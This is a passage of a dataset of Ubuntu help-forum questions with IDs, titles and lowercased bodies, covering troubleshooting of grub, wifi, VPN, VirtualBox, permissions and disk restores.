trusty-backports/multiverse translation-en 忽略 http : //ppa.launchpad.net saucy/main translation-zh_cn 忽略 http : //ppa.launchpad.net saucy/main translation-zh 命中 http : //archive.ubuntu.com trusty-backports/restricted translation-en 忽略 http : //ppa.launchpad.net saucy/main translation-en 忽略 http : //ppa.launchpad.net saucy/main translation-zh_cn 命中 http : //archive.ubuntu.com trusty-backports/universe translation-en 忽略 http : //ppa.launchpad.net saucy/main translation-zh 获取：17 http : //archive.ubuntu.com trusty-security/main sources [ 970 b ] 忽略 http : //ppa.launchpad.net saucy/main translation-en 获取：18 http : //archive.ubuntu.com trusty-security/restricted sources [ 14 b ] 获取：19 http : //archive.ubuntu.com trusty-security/universe sources [ 14 b ] 获取：20 http : //archive.ubuntu.com trusty-security/multiverse sources [ 14 b ] 获取：21 http : //archive.ubuntu.com trusty-security/main amd64 packages [ 977 b ] 获取：22 http : //archive.ubuntu.com trusty-security/restricted amd64 packages [ 14 b ] 获取：23 http : //archive.ubuntu.com trusty-security/universe amd64 packages [ 14 b ] 获取：24 http : //archive.ubuntu.com trusty-security/multiverse amd64 packages [ 14 b ] 获取：25 http : //archive.ubuntu.com trusty-security/main i386 packages [ 977 b ] 获取：26 http : //archive.ubuntu.com trusty-security/restricted i386 packages [ 14 b ] 获取：27 http : //archive.ubuntu.com trusty-security/universe i386 packages [ 14 b ] 获取：28 http : //archive.ubuntu.com trusty-security/multiverse i386 packages [ 14 b ] 命中 http : //archive.ubuntu.com trusty-security/main translation-en 命中 http : //archive.ubuntu.com trusty-security/multiverse translation-en 命中 http : //archive.ubuntu.com trusty-security/restricted translation-en 命中 http : //archive.ubuntu.com trusty-security/universe translation-en 忽略 http : //archive.ubuntu.com trusty/main translation-zh 忽略 http : //archive.ubuntu.com trusty/multiverse translation-zh 忽略 http : //archive.ubuntu.com trusty/restricted translation-zh 忽略 http : //archive.ubuntu.com trusty/universe translation-zh 忽略 http : //archive.ubuntu.com trusty-updates/main translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-updates/main translation-zh 忽略 http : //archive.ubuntu.com trusty-updates/multiverse translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-updates/multiverse translation-zh 忽略 http : //archive.ubuntu.com trusty-updates/restricted translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-updates/restricted translation-zh 忽略 http : //archive.ubuntu.com trusty-updates/universe translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-updates/universe translation-zh 忽略 http : //archive.ubuntu.com trusty-backports/main translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-backports/main translation-zh 忽略 http : //archive.ubuntu.com trusty-backports/multiverse translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-backports/multiverse translation-zh 忽略 http : //archive.ubuntu.com trusty-backports/restricted translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-backports/restricted translation-zh 忽略 http : //archive.ubuntu.com trusty-backports/universe translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-backports/universe translation-zh 忽略 http : //archive.ubuntu.com trusty-security/main translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-security/main translation-zh 忽略 http : //archive.ubuntu.com trusty-security/multiverse translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-security/multiverse translation-zh 忽略 http : //archive.ubuntu.com trusty-security/restricted translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-security/restricted translation-zh 忽略 http : //archive.ubuntu.com trusty-security/universe translation-zh_cn 忽略 http : //archive.ubuntu.com trusty-security/universe translation-zh 下载 163 kb，耗时 1分 8秒 ( 2,387 b/s ) w : 无法下载 http : //ppa.launchpad.net/mc3man/trusty-media/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : 无法下载 http : //ppa.launchpad.net/mc3man/trusty-media/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
453038	update-grub ignoring some options in /etc/default/grub	just installed another hard drive and noticed that grub automatically added the necessary menu entries to boot off it . i wanted to adjust these new entries by editing /etc/default/grub , but it seems some settings are ignored or overridden by the update-grub and grub-mkconfig scripts . specifically these lines : grub_timeout=2 grub_os_prober_skip_list= '' 469841589841479f '' i did remove the grub_hidden_timeout=0 line as the documentation said it was deprecated and replaced it with : grub_timeout_style= '' hidden '' after running either script , the resulting grub.cfg file does contain : if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=hidden set timeout=2 # fallback hidden-timeout code in case the timeout_style feature is # unavailable . elif sleep -- interruptible 2 ; then set timeout=0 fi fi # # # end /etc/grub.d/00_header # # # so the timeout option is used here . the problem seems to be later with the /etc/grub.d/30_os-prober section . before i had the second hard drive , there were obviously no entries from that . now that there is , this gets added to grub.cfg : # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 7 ( loader ) ( on /dev/sdb1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-ca0e41be0e41a3f3 ' { [ snip ] } menuentry 'windows recovery environment ( loader ) ( on /dev/sdb2 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-469841589841479f ' { [ snip ] } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # so , not only does it not ignore the partition i told it to , but the os-prober part of the script will not allow me to set a timeout of 0 and forces a menu ( i 'm used to just holding down the left shift key when powering on if i ever want to change boot options ) . a second or two timeout delay is only mildly annoying , but having a menu forced when i explicitly do n't want one , and this menu including a partition that should never be listed is much more so . short of editing grub.cfg every time , or tweaking /etc/grub.d/30_os-prober ( which may get overwritten during an upgrade ? ) is there a fix for this ? thanks !
453040	ca n't connect to vpn on lubuntu 14.04 lts	i 've installed lubuntu 14.04 lts and after having solved the network manager problems adding the nm-applet service on autostart , i configured my vpn correctly but ca n't connect to it . i 've tried many things : i have reinstalled the network manager and also all the dependencies related to it , like vpnc etc . nothing worked
453041	multitouch in qt	i 've got a fresh install of kubuntu 14.04 and qt creator/5.2.1 , and i 'm trying to get multi-touch working for the example applications like photosurface . my input device is an acer t272hl 10 point multi-touchscreen , xinput refers to it as `` advanced silicon s.a cooltouch ( tm ) system '' , and i 've seen it tracking multiple touches using geisview , but nothing else in the system seems to recognize any multi-touch activity . any ideas how to get qt to start listening to the same `` channel '' that geisview is using to get those multi-touches ? thanks , update : do n't ask why , but i had 2 usb mice plugged in . removing the extra mouse enabled the pinch to zoom features in chromium , but ... even after a reboot , the qt photosurface example is only responding to single touches from the touchscreen , no pinch to zoom or rotate . here 's the current xinput feedback : $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ advanced silicon s.a cooltouch ( tm ) system id=8 [ slave pointer ( 2 ) ] ⎜ ↳ imps/2 logitech wheel mouse id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=11 [ slave keyboard ( 3 ) ] i 'd really like to develop multi-touch enabled qt apps for this system , but so far , they seem to be deaf to the multi-touch events .
453043	can not mount second drive at `` / ''	i have a second drive that i want to be mounted at the root . the drive contains the following folders : /home /shared i want those two folders to be accessible at `` / '' . i can mount the drive at /media/disk1 but that does not solve my problem . i tried the following command but it does n't work : mount /dev/sdb1 / i have no errors but the folders do not appear on /
453044	system settings not showing all settings	this is a weird problem i am having after installing ubuntu 14.04 . when i click on system settings , it shows only 7 fields : personal : language support security & privacy ubuntu one ubuntu tweak hardware : printers system : landscape service software & updates even when i click on sound settings or date and time settings the same thing happens . i was having some problems with pulseaudio due to which i had tried changing its configuration files ( did n't make backups . lesson learnt ) . this led to even worse crashes . so i purged pulseaudio and reinstalled it in the hope that everything will be as it was . but now my sound is not working and there is no way to change any setting .
453047	how to connect to projector ( epson ex7220 ) wirelessly	i 've got my hands on a projector ( epson ex7220 ) and i 've got it connected to my lan over wi-fi . how might i connect my laptop to it ? ( thinkpad x1 carbon with ubuntu gnome 13.10 ) any help would rock !
453050	how to install a web server on ubuntu 14.04 ?	: ~ $ sudo apt-get install tasksel reading package lists ... done building dependency tree reading state information ... done package tasksel is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'tasksel ' has no installation candidate
453052	how to unlock hard disk ?	i have just installed ubuntu 14.04 all my 500gb hdd as in one drive . i cleared all the data on hdd while installing . but while starting os , it asks to enter passphrase . with the usb i used to install ubuntu , i am now trying ubuntu , here i can see 2 drives , one of 256mb and other of 499gb that has a lock symbol over it ( in home it is written as `` 499gb encrypted '' ) . on clicking the drive , a window is popped that shows `` enter a passphrase to unlock this volume '' . i do n't understand what this is and am unable to open . i did not set any such password to hard drive . i tried the password that i set to log into ubuntu but that gives out error showing , `` no key exists with that passphrase '' . please help what can i do to open my os in normal way . can anyone explain what this problem is and why does this occurs ?
453057	can not move files to trash	i just upgraded to ubuntu 14.04 , and getting a bug where i ca n't move files to the trash . when i go to delete something it says file `` ca n't be put in the trash . do you want to delete it immediately ? '' i tried the instructions here : ca n't move files to the trash but it did n't work . not sure why this happened with the upgrade . any help much appreciated !
453058	choppy hd video playback with unity/gnome	i have been facing a video playback problem with ubuntu for a long time . everytime i try to play a 720p/1080p video on my laptop , the performance is choppy with frames dropped every second or so . i face this problem when using unity or gnome 3 . but if i use gnome fallback , there is no problem . my laptop is dell vostro v130 with intel hd graphics and 4 gb ram . i use vlc for video playback . i ca n't remember ever being able to play hd videos on unity or gnome 3 .
453059	i want to delete a partition	i want to dual boot windows 8 and linux so , i need to create a separate partition for linux . all i wanted on the new partition is 15gbs . my computer wont let me `` shrink volume '' to create the partition . i did n't even get a suggested amount to shrink the volume . i can put in my suggested amount but the `` shrink '' button is greyed out . according to what i read on a few post it 's because i already have 4 partitions ? my question is can i delete any of the existing partitions without screwing up windows 8 boot system . the site wo n't let be post any images since i 'm new . anyways , the four partitions showing up in the disk management log are : healthy ( recovery partition ) 400mb capacity , 400mb free space . healthy ( efi system partition ) 100mb capacity , 100mb free space . healthy ( recovery partition ) 11.72gb capacity , 11.72gb free space . acer c/ ( healthy ( boot , page file , crash dump etc ) 106.91gb capacity , 41.22gb free space . any suggestion is appreciated.. thanks
453061	access advanced features and commands of gui from rhythmbox-client ?	does rhythmbox-client include actions like loading a playlist and playing it , viewing playlists or list of songs , shuffling the playlist and current play order ? basically can i do everything i can do with the gui , from the terminal using rhythmbox-client or do i need something else ? i read the man page but it displays a basic list of commands , and not much else .
453066	ubuntu never resumes from lid close , absolutely never	whenever i close the lid to my computer , it goes into standby just like it did on windows 7 , though when i open the lib on my dell vostro 1720 , it shows a kde password dialog just like the one shown after locking the computer manually , but the cursor does n't blink , nor can i enter my password . after waiting ~5 minutes , the login screen starts to fade in , but it freezes part way through fading in , it never gets past the login screen , it completely freezes except for my mouse . setting it to only make the screen blank when the lid is n't really a viable option as it would only drain the battery a bit slower , and i want the hard drive to spin down as i take it from class to class . it 's a royal pain in the butt to have to reboot the thing , as it takes about 5 or 6 minutes to do so as it has a bunch of programs and mods that i added so i could use it at school and still be able to get work done on the thing . i want to know how i can make the computer resume from suspend when i open the lid , and have it take less than 3 minutes , preferably less than 30 seconds .
453067	remove lines of code from multiple files	i 'm running a web server in a virtual box for testing some projects . and i noticed that some of the html files have this unwanted lines . i want these lines of code from multiple html/htm files removed so i did it like this : find /desktop/test_removal3/ -name '*.html ' -or -name '*.htm ' -or -name '*.php ' | sed -i `` / < script language=vbscript > / , / // -- > < /script > < ! -- /d '' so far , the 1st part where if looks/finds all html files works . the part where i need to remove the lines starting from < script language=vbs > to < /script > using sed fails : d i 'll try to figure it out again while waiting for your suggestions and scolding on where i went wrong : d
453069	how to install software from outside ubuntuâs software repositories	i would like to install media player like vlc . i have all the setup from my previous os ( windows 7 ) with format setup.exe . can i install them on ubuntu now ?
453070	how to install classicmenu-indicator or python-appindicator on ubuntu 14.04 x64 ?	i installed ubuntu 14.04 x64 . when i try to install classicmenu-indicator it says about unresolved dependency python-appindicator when i try to install python-appindicator it tries to install python-appindicator : i386 ( why ? how to install 64 bit one ? ) . it requires python : i386 . when i try to install python : i386 it requires to remove all python dependent packages including important for me . how to install classicmenu-indicator or python-appindicator at this os ? with best regards . viktor .
453072	what is nss-myhostname ? and why is it not installable ?	dmesg shows the line systemd-hostnamed [ 3964 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! but sudo apt-get install nss-myhostname says paketlisten werden gelesen ... fertig abh채ngigkeitsbaum wird aufgebaut . statusinformationen werden eingelesen ... . fertig e : paket nss-myhostname kann nicht gefunden werden . ... meaning `` nss-myhostname not found '' . why ? do i have to react on the dmesg message ?
453073	failed to download package files . check your internet connection	i get this message any time i try to install playonlinux from the software center . i know that my internet connection is fine . i want to install playonlinux for instal microsoftoffice but everytime want to download playonlinux always appears a message `` failed to download package files . check your internet connection '' . just install playonlinux can not . please give me a solution , so i can install playonlinux ? ? ?
453075	ubuntu and logitech mouse	hi i have a logitech mk320 mouse and keyboard combo and i lost the receiver ! can i buy a new mouse with a new receiver and pair it with the keyboard with solaar ?
453076	permissions of www-data on an addtional drive on ubuntu 14.04	i 'm trying to give rwx permissions to www-data in /media/bblab/database/data to install owncloud . bblab is my user name and database is my disk label . the step i mount the drive is : login as bblab ( the user created when i installed ubuntu ) open disk application and find an empty drive /dev/dm-2 ( hard drive 2t*2 installed on motherboard with hardware raid 1 ( gigabyte x79-up4 ) ) create a new partition on drive /dev/dm-2 and the partition is named /dev/dm-3 mount the partition /dev/dm-3 at /media/bblab use terminal to change the permission of the media to 750 add group www-data to /media/bblab/database sudo chown -r www-data : www-data /media/bblab/database/data and now when use command ls -al /mdeia/bblab/database , the result is drwxr-x -- - bblab www-data . drwxr-x -- - root root .. drwxrwx -- - www-data www-data data drwx -- -- -- root root lost+found but owncloud still gives the following messages : ca n't create data directory ( /media/bblab/database/data/data ) this can usually be fixed by giving the webserver write access to the root directory . is there any step i 'm doing wrong or have forgotten to do ? thanks !
453079	trouble installing on old laptop	i am trying to download ubuntu to my ancient xp laptop . partially through the download using the windows installer , a message pops up asking which windows program do i want to use to install , and an option to search the web for a program . where do i go from here ? i put ubuntu on my desktop last week , and do n't remember seeing this . any help appreciated ! scott
453082	keep windows in virtualbox from locking	i am running a corporate image of windows 7 in a virtualbox on my ubuntu machine . because of restrictions from the corporation i am not allowed to change windows so it will not turn on screensaver and lock itself , asking for a password after a given time . because i run it as a guest machine there is of course no reason for such a timer , as ubuntu has one . is there a way to send a signal to the guest to keep it alive while i use ubuntu ? it is very inconvenient that it locks itself while i use the ubuntu host .
453086	difference between root and home	i download a program from repository and install that . i know we need three partitions for linux : ( 1 ) swap , ( 2 ) / ( 3 ) , /home . also i know /home is like a user profile and / is like a operating system profile . so , we see the conclusion , if i install a program from repository this program belongs to me and not related to operating system . but you know the place of downloaded program is /usr/bin and etc but not in /home ? /home is my profile . please say where my conclusion is wrong ?
453087	nx error : can not accept public key	i have installed nomachine for linux -x86_64 , amd64 from deb package to my ubuntu machine . connecting to it from windows using nx protocol and password authorization works just fine . but i get the following error when trying to connect using private key : ooops ! the session negotiation failed . error : can not accept public key i copied the key from /usr/nx/share/keys/default.id_dsa.key to my windows client . i also tried to use my keys defined in ~/.ssh/authorized_keys .
453088	fullscreen hotkey bind not taking	my problem is i ca n't get the following setting to `` take '' : i read on ubuntu forums ( and unfortunately i ca n't post more than 2 links in this post ) that the bind may be overwritten by compiz settings if you 've played in ccsm before , so i installed the extra compiz plugins and have also changed my fullscreen hotkey there : . however , even though the settings save , the hotkey does n't work in any application . any ideas what other settings or environment might be holding back this hotkey ?
453092	oracle virtual box : windows 8 host , ubuntu vm shared folder mount fails	i am really desperate - today i wanted to reinstall my ubuntu vm on a windows 8 host and followed exactely the same procedure as i did last time . but now i can no longer share a folder between windows 8 and ubuntu . i try to share my windows 8 folder with name name like this : i select it as shared folder in the settings ( auto-mount and permanent > > in ubuntu i find the correctly created folder sf_name in /media ) then in the terminal in the vm i use : cd /media sudo mkdir name sudo mount -t vboxsf name /media/name this results in the error message re mount : wrong fs type , bad option , bad superblock on /media/name , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so edit : fixed this fixed it for me sudo apt-get install virtualbox-guest-dkms virtualbox-guest-utils virtualbox-guest-x11 source : guest additions not working
453096	why was the virtualbox package removed from the 14.04 repository ?	i 'm having some problems trying to run my windows xp virtual machine after upgrading to ubuntu 14.04 today . when i tried to start it a message dialog was displayed saying that the kernel drivers are n't installed , in concrete they should be provided by a packaged named virtualbox-dkms . i decided to reinstall virtualbox so dependencies will get auto resolved , but the execution of command ( sudo apt-get install -- reinstall virtualbox ) resulted in a message similar to : `` can not reinstall package because the package can not be downloaded '' ( i 'm reproducing the message by memory ) . then i tried using synaptic package manager gui . the package virtualbox and its dependencies are there , but without version number or description . then i switched to main servers , and tried to update , now the package is n't even there anymore . it may be a problem with my sources.list file but also may be that for some reason i do n't know they decide to remove virtualbox from repository . i think i will try to download the packages from the virtual box site for now but in ubuntu i always installed virtualbox from repository .
453099	attempting to setup ubuntu 12.04 ssh server : -bash : /etc/hostname : permission denied	attempting to setup an ssh-server running ubuntu 12.04 . went to `` howtoforge '' to scout for potentially advanced or knowledgeable advice upon how to accomplish this , then i ended up running into a problem ; off of one of their `` perfect server setup '' how-to 's , naturally taking advantage the distro mentioned above . regardless , i am hitting a point where the instructions want me to echo the following command to /etc/hostname : echo server1.example.com > /etc/hostname ... then the following error is thrown : -bash : /etc/hostname : permission denied great , do n't know why , i should have administrative privileges . then i tried to see whether /etc/hostname is writable via lsattr , and i get : -- -- -- -- -- -- -e- /etc/hostname last time i checked , this implied that my file was not immutable . in either case , what is happening , and what am i doing wrong ? want to setup a `` secure '' server , and all i read are a bunch of snarky comments online that grant little to no assistance for my needs ; or anyone else 's for that matter . too many elitist mentalities bouncing around i guess . in either case , i would absolutely appreciate it if anybody could shed some light on this dilemma . thanks in advance .
453106	ubuntu 14.04 : very slow ui in oracle virtualbox	i recorded a video . short summary : 14.04 is much slower than 12.04 even with more ram assigned . i 'm using latest virtualbox 4.3.10 on mavericks 10.9.2 . how can i make it faster ?
453107	wifi speed dropping for hp pavilion 15-n097sa [ solved ]	i recently moved to ubuntu 14.04 from windows 8.1 . i have quite a problem with my wifi speed dropping . when i checked it at speedtest.net it went from 30mbps to less than 1mbps then goes up again to about 18mbps in just a few seconds . that 's happening all the time making video calls impossible as well as streaming music and watching videos on youtube . the problem is not existent in when running windows . i have a `` integrated 10/100 base-t ethernet lan '' with just the stock driver on a hp pavilion 15 . the power management of wlan0 is off . i have almost no knowledge of the terminal so if you help me please explain it like i 'm a complete noob ( which is true ) . cheers ! p.s . a link to the specs of my laptop - http : //h10025.www1.hp.com/ewfrf/wc/document ? cc=us & lc=en & dlc=en & docname=c03987135
453109	ubuntu 14.04 - add fake display when no monitor is plugged in	i have an ubuntu 14.04 server that has no external monitor connected . i use nomachine to remote control the machine . when i do so , the unity/gnome interface does n't see any monitors connected , so i can only use 800x600 when connecting with nomachine . if i plug in a monitor , i can set the resolution to whatever size the nomachine window is on the remote computer . is there a way to create a `` fake '' monitor device on ubuntu so i can set a desktop resolution in unity/gnome ?
453110	rtl8187 wireless card drops signal within seconds	my realtek rtl8187 usb wifi card is having trouble keeping a connection for more than a few seconds , while on the same machine under windows 7 it has no problem . when i make the connection , i have a few seconds of full-bandwidth communication , followed by the connection completely failing to send or receive packets ( the card usually makes a soft sound from the antenna , under both oss , which cuts out , along with actual networking capabilities on ubuntu ) . network manager and wicd both report the card as still connected , with reasonable signal levels ( around -40dbi , which is not a problematic level for this card on windows ) . the loss of communication happens replicably and reliably , although occasionally i manage to transmit and receive a few stray packets . the indicator light on the card flickers constantly and abnormally quickly after the connection is lost . i 've tried to connect to both my wpa2 and ( with consent ) a neighbor 's wep access points ( mine being netgear , and theirs being belkin ) , with the same result of losing the link after roughly one second . ethernet is un-affected . this card is being used with the rtl8187 kernel module . i 'm using a clean , fresh installation of trusty x64 . this did not occur on the live cd . dmesg | tail -n 25 for the wep network : hexafraction @ ubuntu-lapdesk : ~/downloads $ dmesg | tail -n 25 [ 16505.923287 ] wlan1 : associated [ 16505.923370 ] ipv6 : addrconf ( netdev_change ) : wlan1 : link becomes ready [ 16505.943812 ] ipv6 : addrconf ( netdev_change ) : wlan1 : link becomes ready [ 16535.278129 ] atl1c 0000:01:00.0 : atl1c : eth0 nic link is down [ 16540.067784 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 16543.677051 ] wlan1 : deauthenticating from [ previous ap mac ] by local choice ( reason=3 ) [ 16543.737566 ] cfg80211 : calling crda to update world regulatory domain [ 16543.747499 ] cfg80211 : world regulatory domain updated : [ 16543.747510 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 16543.747518 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16543.747524 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16543.747529 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 16543.747534 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16543.747539 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 16546.240014 ] wlan1 : authenticate with [ ap mac ] [ 16546.298661 ] wlan1 : send auth to [ ap mac ] ( try 1/3 ) [ 16546.300412 ] wlan1 : authenticated [ 16546.300741 ] rtl8187 1-3:1.0 wlan1 : disabling ht/vht due to wep/tkip use [ 16546.300747 ] rtl8187 1-3:1.0 wlan1 : disabling ht as wmm/qos is not supported by the ap [ 16546.300751 ] rtl8187 1-3:1.0 wlan1 : disabling vht as wmm/qos is not supported by the ap [ 16546.304473 ] wlan1 : associate with [ ap mac ] ( try 1/3 ) [ 16546.307090 ] wlan1 : rx assocresp from [ ap mac ] ( capab=0x431 status=0 aid=2 ) [ 16546.307946 ] wlan1 : associated [ 16546.307992 ] ipv6 : addrconf ( netdev_change ) : wlan1 : link becomes ready [ 16546.308625 ] ipv6 : addrconf ( netdev_change ) : wlan1 : link becomes ready lsmod : module size used by rtl8187 64909 0 mac80211 626489 1 rtl8187 cfg80211 484040 2 mac80211 , rtl8187 nls_utf8 12557 0 isofs 39835 0 ctr 13049 0 ccm 17773 0 rfcomm 69160 0 bnep 19624 2 bluetooth 395423 10 bnep , rfcomm hid_generic 12548 0 joydev 17381 0 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core usbhid 52616 0 eeprom_93cx6 13344 1 rtl8187 arc4 12608 2 hid 106148 2 hid_generic , usbhid kvm_amd 59987 0 kvm 451511 1 kvm_amd radeon 1514165 3 psmouse 102222 0 k10temp 13126 0 toshiba_acpi 22901 0 sparse_keymap 13948 1 toshiba_acpi serio_raw 13462 0 wmi 19177 1 toshiba_acpi snd_hda_codec_conexant 57441 1 snd_hda_codec_hdmi 46207 1 snd_hda_intel 52355 5 snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel ttm 85115 1 radeon snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq drm_kms_helper 52758 1 radeon snd 69238 21 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi soundcore 12680 1 snd drm 302817 5 ttm , drm_kms_helper , radeon video 19476 0 i2c_piix4 22155 0 i2c_algo_bit 13413 1 radeon mac_hid 13205 0 parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc ahci 25819 2 atl1c 46086 0 libahci 32168 1 ahci i 'm at a loss here , as i 've tried reboots , wicd , and network-manager . the card itself is fine on windows 7 ( as i still dual-boot and can test it ) . i 've removed network-manager before using wicd , and vice-versa , as well as having both installed . my suspicion is that some service or background program is causing the card to channel-hop , but i am not sure how to check whether that is happening , or which service is causing it . however , the hard-block issues seen on the live cd are not happening . due to my not having been able to check this on previous versions due to gpu incompatibility making ubuntu unusable , i have no evidence that this is a bug introduced in trusty . edit : sudo iwconfig wlan1 when not connected : wlan1 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off sudo iwconfig wlan1 when connected to my wpa2 net : wlan1 ieee 802.11bg essid : '' xxxxxxxxxx '' mode : managed frequency:2.462 ghz access point : xx : xx : xx : xx : xx : xx bit rate=54 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=39/70 signal level=-71 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:2 missed beacon:0 sudo iwconfig wlan1 for wep : wlan1 ieee 802.11bg essid : '' xxxxxxxxxx '' mode : managed frequency:2.437 ghz access point : xx : xx : xx : xx : xx : xx bit rate=11 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key:15a4-a159-af power management : off link quality=47/70 signal level=-63 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:27 invalid misc:33 missed beacon:0 i know for a fact that windows experiences higher signal levels , both in terms of the dbm scale , and in terms of reported percentage connection quality .
453114	restoring clonezilla images - cat | gzip | partclone not working !	i am trying to restore an image that was taken with clonezilla . it was taken from a windows 7 machine and was broken up into multiple files of the following format.. sda1.ntfs-ptcl-img.gz.a* ( where * goes from a-k ) i have searched online for methods of restoring these images and the most frequently used is as follows : sudo cat /dir-to-images/sdb1.ntfs-ptcl-img.gz . * | sudo gzip -d -c | sudo partclone.restore -c -s - -o /dir-to-new-image/hda1.img however , when i try this : sudo cat sda1.ntfs-ptcl-img.gz.a* | sudo gzip -d -c | sudo partclone.restore -c -s - -o partclone-restore.img i get the following error : partclone v0.2.70 http : //partclone.org starting to restore image ( - ) to device ( partclone-restore.img ) device ( partclone-restore.img ) is mounted at error exit partclone fail , please check /var/log/partclone.log ! so , let 's look at partclone.log ... partclone v0.2.70 http : //partclone.org starting to restore image ( - ) to device ( partclone-restore.img ) device ( partclone-restore.img ) is mounted at error exit same exact error..am i missing something here ? can anyone point me in the right direction ? i am using ubuntu 12.04
453115	vanished dependency : gir1.2-launchpad-integration-3.0	i 'm trying to install a facebook-webapp but the dependency gir1.2-launchpad-integration-3.0 is not found and listed as uninstallable . i have been unable to locate it anywhere except for references to 'nitro ' ( which apparently does n't work either because of this package missing ) . does anyone know what is going on and how i can work around this ? i am running ubuntu 14.04 , fresh install and novice user .
453117	nexus 7 ( flo ) and ubuntu touch	i installed ubuntu touch on my n7 ( flo ) using the command ubuntu-device-flash -- channel=trusty-proposed -- bootstrap . i successfully installed it . i 've browsed around the internet , and i see people using ubuntu touch in landscape on the nexus 10 , yet on my n7 it looks as if ubuntu touch is treating the n7 as a phone . is the tablet interface only for the nexus 10 , or did i do something wrong ?
453120	laptop power saving or management in ubuntu 14.04	is there any sort of installation that can be added to provide power options for when i am running on battery ? i would n't want to always be on power savings , so i would hope i could switch between eco and performance like i do with windows 7 . anything like this out there ?
453121	setting up a debug/profiling environment for remote site	i 'm having some issues with profiling a site that is loading slowly ( close to 2 minutes ) . it is developed in php , smarty and mysql ( using nginx as the web server ) , and i 've been wanting to use xdebug to profile it ; but , there 's some sort of misconfiguration on the remote server that does n't allow me to connect to the debugging session from netbeans , so i copied all the site 's contents via ftp and am trying to debug locally , replicating the remote environment ( ubuntu , php , and nginx ) as best i can . however , i seem to be running into permission issues ( i have all the content under /home//public_html with all the files and folders under it having permissions set to 755 or even 777 ) after following countless guides , so i 'm asking for advice on whether or not this is the best approach , or what i should do to make this as straightforward and effortless as possible . i 'm using ubuntu 14.04 with the latest ( to date ) php , mysql and nginx installed from apt-get .
453123	while upgrading to ubuntu 14.04 i personally edited the source list and corrupted it , need suggestion to resolve and upgrade !	i 'm new to ubuntu , while upgrading from ubuntu 13.10 to 14.04 i was getting some errors in the source list . while trying to make it right i used a source list of another pc and replaced it with mine , now my ubuntu source list seems to be completely corrupted and i 'm stuck in the process of upgradation . need help fast this is my current source list . # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it 